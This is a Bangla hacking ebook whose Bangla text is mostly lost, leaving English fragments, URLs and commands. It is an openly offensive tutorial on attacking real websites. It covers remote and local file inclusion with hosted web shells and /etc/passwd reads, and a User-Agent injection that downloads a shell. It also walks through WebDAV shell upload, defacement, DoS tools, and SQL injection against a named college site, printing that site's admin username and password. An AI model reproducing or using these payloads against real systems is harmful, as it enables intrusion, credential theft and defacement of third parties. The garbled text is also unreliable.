Hacking Bangla Ebook
Jack nax
Cyan Tarek
pirate_king
Log Out
Shojib
Niloy
www.fb.com/md.faroqueahmed
www.hackerthreads.org
www.hackforums.net
www.hacker.org/forum
www.crackhackforum.com

http://www.ethicalhacker.net/
http://insecure.org/
http://hacker.resourcez.com/
http://www.certifiedethicalhacker.com/
http://www.elitehack.net/
http://www.elite-hackers.com/
http://www.exploitdb.com/
http://www.1337day.com/
http://www.breakthesecurity.com/
http://www.thehackerslibrary.com/
http://www.port7alliance.com/
http://www.hackers.nl/
http://hackmein.tripod.com/
http://kyrionhackingtutorials.com/
http://www.hackinggurus.net/
http://hackmyass.wordpress.com/
http://www.borntohack.in/
http://www.criticalsecurity.net/
http://www.mpgh.net/
http://www.duniapassword.com/
http://www.progamercity.net/
TRON (1982), THE GIRL WITH THE DRAGON TATTOO (2009), WARGAMES (1983), DIE HARD
4: LIVE FREE OR DIE HARD (2007), SNEAKERS (1992), THE MATRIX (1999), EXISTENZ (1999), THE
CONVERSATION (1974), THE SCORE (2001), FOOLPROOF (2003), HACKER (1995), ANTITRUST
(2001), PIRATES OF SILICON VALLEY (1999), THE LAWNMOWER MAN (1992), THE CORE (2003),
VIRTUOSITY (1995), TAKEDOWN (2000), DEJA VU (2006), ONE POINT O (2004), REVOLUTION OS
(2001), THE NET (1995), TRON: LEGACY (2010), THE ITALIAN JOB (2003), DISCLOSURE (1994),
JURASSIC PARK (1993), SWORDFISH (2001), THE THIRTEENTH FLOOR (1999), UNTRACEABLE
(2008), GAMER (2009)
?
IP Address ??
IP Address ? IP Address Internet Protocol Address Network-
Device- Communication- Internet Protocol IP Address
Unique, IP Address
IP Address Network Internet Service Provider-
Internet IP Address-
IP Address- ? IP Address-
1. Host Network Interface , Communication
2. Network IP Address ,
Network IP Address- IP Address-
Binary Number, ( )
IP Address- Version
Start->Run-> cmd -
netstat -n
:
www.whatismyip.com
ftp->21, smtp->25, dns->53, http->80, https->81, pop3->110, telnet->23
Start->Run-> cmd -
tracert websitename
tracert yahoo.com
nslookup
You are now authentized to this route
www.samspade.com
www.dnsstuff.com
www.whois.net
www.who.is
Reply- Show original
gmail
?
gmail https
http Hyper Text Transfer Protocol. https http secured
(, , )
http://readnotify.com/
victimsemailid.rednotify.com
http://www.didtheyreadit.com/
http://www.pointofmail.com/
:
http://www.ip2location.com/
netstat -n ?
, ,
: ICQ Messenger,
MSN Messenger, Yahoo Messenger, Gtalk, Meebo, Gigsby, AIM
?
- ICQ Messenger
ICQ Messenger (-> ->)
Start->Run->cmd->netstat -n
Start->Run->cmd->netstat -n
-
.::: Yahoo Messenger, MSN Messenger, GTalk Messenger :::.
.::: Meebo, Gigsby, Trillion :::.
- ( - )
Forget password
Forget password
>impersonation
>posing as imp. user
>3rd person approach
>technical support
:
>mail/im attachments
>pop up windows
>sweepstakes
>spam mail
-
vulnerable ? ? , ?
.
http://www.targetsite.com/index.php?page=Anything
inurl:index.php?page=
index.php?page= ,
vulnerable ?
http://www.targetsite.com/index.php?page=www.google.com
http://www.cbspk.com/
vulnerable .
http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.com
RFI
c99 shell
c99 shell
-ripway.com, 110mb.com
Shells ,
r57 shell
ripway.com
http://h1.ripway.com/tjunselected/c99shell.php?
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/tjunselected/c99shell.php?
, ?
XSS ?
XSS XSS ? Cross site Scripting
XSS CSS(Cascading Style sheet) Web
Application Vulnerability vulnerability
client side scripts ( Javascript) vulnerability
malicious codes, malware attack, phishing inject
http://3.bp.blogspot.com/_lBoKsfWMhbE/TLYDr8vQmTI/AAAAAAAAAAM/V1wVWY0GB70/s1600/xss-threat3.jpg
Vulnerable
: Vulnerability
, Vulnerability
parameter ?
,
search query, username, password.
Vulnerability
: injection
malicious script ,
malicious script
http://2.bp.blogspot.com/8z5CXuZZpeg/TpgBgtdbdBI/AAAAAAAAAsE/qCTc_dxniWE/s1600/search+box.jpg
: URL injection
URL http://vulnerablewebsite/search?q=malicious_script_goes_here
input fields
http://vulnerablewebsite/search?q=
: Malicious Scripts
Vulnerability , malicious scripts
cookies malware attack
cookie stealing script malicious script url
http://attackerSite/malicious.js
Persistent XSS:
XSS vulnerability.
malicious script injection ,
malicious script injection , -
, search query
XSS permanent storage.
Non-Persistent XSS:
Reflected XSS malicious script
,
injection ,
-
malicious code temporarily .
Vulnerability ?
Bypassing restriction
Session Hijacking
Malware Attack
Website Defacement
Dos attacks
LFI!
Local File Inclusion.
- LFI Injection
PHP
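<?php
// Deliberately vulnerable: $page is taken straight from the query string and never sanitized
$page = $_GET['page'];
include($page);
?>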
php
$page sanitized
LFI
,
www.mywebsite.com/index.php?page=products.php
, ,
, URL
www.mywebsite.com/index.php?page=mypage.php
, mypage.php
, vulnerable
unix server , etc/passwd
www.mywebsite.com/index.php?page=../etc/passwd
www.mywebsite.com/index.php?page=../../etc/passwd
www.mywebsite.com/index.php?page=../../../etc/passwd
www.mywebsite.com/index.php?page=../../../../etc/passwd
../
www.mywebsite.com/index.php?page=products
,
.php
?page=products
.php
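<?php
// Still vulnerable: ".php" is appended to the unsanitized parameter before inclusion
$page = $_GET['page'];
include($page . ".php");
?>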
null extension
www.mywebsite.com/index.php?page=../etc/passwd
www.mywebsite.com/index.php?page=../../etc/passwd
www.mywebsite.com/index.php?page=../../../etc/passwd
www.mywebsite.com/index.php?page=../../../../etc/passwd
, passwd file
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
------------------------------------------------------------------------------------------
.::::: :::::.
Requirements:
http://www.filllpg.co.uk/index.php?page=contacts.php
: http://4.bp.blogspot.com/-fh7-99XttP4/TocL11IQMjI/AAAAAAAAANM/gzecxiOXVFA/s400/1.JPG
: http://3.bp.blogspot.com/-WD_WKG02RTQ/TocL5ww6j5I/AAAAAAAAANQ/WM_jJ7BPEaI/s400/2.JPG
, Description
User-Agent User-Agent Tools
> Default User Agent > PHP Info
: http://2.bp.blogspot.com/kpML0wTbmOY/UKBV_gC2FTI/AAAAAAAAAoE/PpFQMVpKzbU/s1600/6.JPG
Ctrl+F
disable_functions
disable_functions
| no value
| no value
User-Agent
Edit
User-Agent
http://www.sh3ll.org/egy.txt -O shell.php');?>[
?
.txt File --> Save as
shell.php ]
http://www.site.com/shell.php
: http://3.bp.blogspot.com/SRkz9h0d8so/UKBWLQD1FMI/AAAAAAAAAoM/lpGNG1UgYMs/s1600/7.JPG
LFI http://pastebin.ca/2385927
http://www.youtube.com/watch?v=FP229bKm5v4
http://www.youtube.com/watch?v=9W9qWAhwaTo
http://www.youtube.com/watch?v=hMguilRsteY
IIS(IIS=The Internet Information Server Attack)
.Run
%WINDIR%EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{BDEADF00-C265-11d0-BCED00A0C90AB50F}
Enter
. WEB FOLDER
>> >>
IIS Exploit ? ?
IIS Exploit , icon smile IIS Exploit
My Computer Add a network Location
Next
Next
http://i1085.photobucket.com/albums/j431/powerin10/no3.jpg
http://www.myxixia.com/
Next
Finish
shell
www.ziddu.com/download/16498227/shell.zip.html
Extract
Power.asp;.jpg
power.asp;.jpg
power.asp;.jpg
http://www.myxixia.com/power.asp;.jpg
index.asp
deface html
open with notepad
index.asp
: http://www.youtube.com/watch?v=iG-cjssooVg&feature=related
. javascript:__doPostBack(ctlURL$cmdUpload,)
- -DdoS ? DdoS ?
DdoS ?
DoS ? DDoS DoS ?
DoS Denial of Service DoS [
] [ ] [ ] TCP / UDP
Denial of Service !
DDoS Distributed Denial of Service
DDoS
DoS DDoS !
? :S ?
DoS DDoS
DoS
DDoS
) :
) sysadmin
DoS / DDoS ?
DoS / DDoS ) )
, ,
----------------------------------------------------------------------------------------------------------------------------------------------------------########################################################################################
DdoS ? DdoS ? DdoS ?
Ddos
DdoS /
!
http://uptime.netcraft.com
Apache/1.3.27 ( Unix)
Apache 1.x
Apache 2.x
GoAhead WebServer
----------------------------------------------------------------------------------------------------------------------------------------------------------########################################################################################
DoS ? DoS ?
Extract
http://www.mediafire.com/?famiivi799a9459
Run as
administrator
. URL
( ,
http://www.alexa.com/topsites/ , ,
)
. "lock on"
. "http"
.Threads 1000
-----------------------------------------------------------------------------------------------------------------------------------------------------------########################################################################################
DoS / DDoS ?
/ ,
) ! CMD
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
APF firewall CMD
apf -d xx.xx.xx.xx
CSF firewall
csf -d xx.xx.xx.xx
, iptables
iptables -I INPUT 1 -s xx.xx.xx.xx -j DROP
xx.xx.xx.xx
Microsoft Knowledge Base (KB)
150543
http://support.microsoft.com/default.aspx?scid=kb;en-us;150543&sd=tech
!
http://www.symantec.com/index.jsp
http://www.symantec.com/index.jsp
http://www.zonealarm.com/
http://www.comodo.com/
Havij
SQLi
Download
.Havij 1.5 Pro : http://www.mediafire.com/?s7a89dxmfwxcyij
Google.Com
"inurl:php?id="
Dork : http://pastebin.com/DvnHxg7i
2,010,000,000 (0.23 )
, php?id=
http://www.paulprescott.com/theme.php?id=10
ID=XX, XX
ID=10
( )
Error , , inject
Havij
Error Analyze ( )
Tables tab
Get DBs
paul_third, information_schema
information_schema MySQL
paul_third
Get Tables
administration panel
admin table
,
Get Columns
id, username ( Username ) password ( Password
), email ( )
Get Data
Username, Password
Find Admin
Administration Panel login
administration panel
.php?id=XX
SQL INJECT
!
SQL INJECT
dork use !
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
dork sql !
8500 SQL dorks list
http://pastebin.com/dzknXjgP
or
http://pastebin.com/ayV6tNS2
dork www.google.com SEARCH !
inurl:news-and-events.php?id=
dork SEARCH
:
http://www.eastodissa.ac.in/news-and-events.php?id=22
SQL INJECT ID
injectable
url
http://www.eastodissa.ac.in/news-and-events.php?id=22'
injectable
: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1
injectable inject
http://www.eastodissa.ac.in/news-and-events.php?id=22
, +order+by+
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+
+ 1
1
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+1- ,
2
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+2-
,
3,4,5 7
8 SQL
(
www.site.com/index.php?id=1 order 999 [ no error ]
order by 999 error
+ id=1 sign
www.site.com/index.php?id=1 order by 999+
error
SQL Injection )
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+8-
Could not connect to MySQL server: Unknown column 8 in order clause
7
7
+union+select+1,2,3,4,5,6,7-
http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,2,3,4,5,6,7-
( , news-and-events.php?id= (
2,3,
2
2 @@version
http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,@@version,3,4,5,6,7-
5.1.68-community
5 inject
group_concat(table_name)
+from+information_schema.tables+where+table_schema=database()--
http://www.eastodissa.ac.in/news-and-events.php?id=22+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schem
a=database()--
est_achievement,est_admin,est_adminlog,est_companyrecord,est_facprofile,est_news,est_notice,est_onlineapplication,est_placementrecord
est_achievement , est_companyrecord
est_admin
group_concat(column_name)
+from information_schema.columns where table_name=
CHAR
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
F9
SQL>MySQL>MySQL CHAR()
ok
est_admin CHAR CHAR(101, 115, 116, 95, 97, 100, 109, 105, 110)
http://www.eastodissa.ac.in/news-and-events.php?id=22+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=CH
AR(101, 115, 116, 95, 97, 100, 109, 105, 110)-
=
est_admin CHAR
uid,userid,password,emailid,signature,last_login
group_concat(login,0x3a,Pass,0x3a),
userId login userId
Pass password
+from+est_admin--
+from+ est_admin est_admin
http://www.eastodissa.ac.in/news-and-events.php?id=22+union+select+1,group_concat(userId,0x3a,password,0x3a),3,4,5,6,7+from+est_admin--
trustadmin:isti$$9!5!2013:
: trustadmin
: isti$$9!5!2013
-http://scan.subhashdasyam.com/admin-panel-finder.php
havij
MD5 www.md5decrypter.cu.uk/
http://www.youtube.com/watch?v=QuW_rSQ5_W0&feature=youtube_gdata_player
shell LiveHTTPHeaders
Mozilla Firefox
https://addons.mozilla.org/en/firefox/addon/live-http-headers/
shell
i-47 shell
http://www.pastebucket.com/19852
or
www.mediafire.com/?64fjdlvzo9zhrra
shell username and password
username: I-47
password: I-47
47.php.jpg (
jpg
47.php.jpg
Live HTTP Headers addon
/save click
47.php.jpg
Reply
shell.php.jpg shell.php
Reply
www.site.com/gallery/37473.jpg
37473.jpg 47.php
www.site.com/gallery/47.php
Video Tutorial :
http://www.youtube.com/watch?v=xSl13HrQHZg&feature=youtu.be
3xtr3m3 H4ck3r
- http://i1114.photobucket.com/albums/k528/rakibulhasan09/Hacker1.gif
- Generate
- Copy
File>Save
as .txt .html All files
Simple Demo - http://pastehtml.com/view/bonelu59o.html
- X3N4X
Enable All
Add
Create Defacement
HTML
Simple Demo - http://pastehtml.com/view/bonexk664.html
HTML
Collection -bcaware
http://www.tunerpage.com/archives/78980
http://www.tunerpage.com/archives/98804
http://www.tunerpage.com/archives/219088
http://www.tunerpage.com/archives/224434
--------------------------------------------------------------------------------------
--------------------------------------------------------------------------------
1. -
2 .Collection
http://www.facebook.com/download/290805637728289/Collection%20of%20Important%20Programming%20Languages%20E.rar
3 .Collection
www.facebook.com/md.faroqueahmed
Mystrious Tusin
www.facebook.com/cyb3rc0d3